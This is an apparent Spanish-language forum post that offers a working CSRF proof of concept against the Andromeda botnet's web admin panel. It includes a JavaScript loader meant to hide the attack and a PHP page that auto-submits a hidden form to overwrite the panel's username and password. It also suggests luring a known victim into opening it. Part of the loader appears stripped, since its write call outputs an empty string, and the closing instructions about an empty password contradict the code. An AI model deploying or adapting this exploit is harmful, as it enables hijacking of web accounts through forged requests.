Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.
Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..
Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.
Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.
Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.
Código: Seleccionar todo
// This code was coded by FrenetikK & Mor3nako.
function writeIf(url) {
document.write('');
}
writeIf('http://127.0.0.1/csrf.php');
Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
Código: Seleccionar todo
<script src="a.js"></script>
Código: Seleccionar todo
<?php
//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url = "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";
echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>
Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.
Un saludo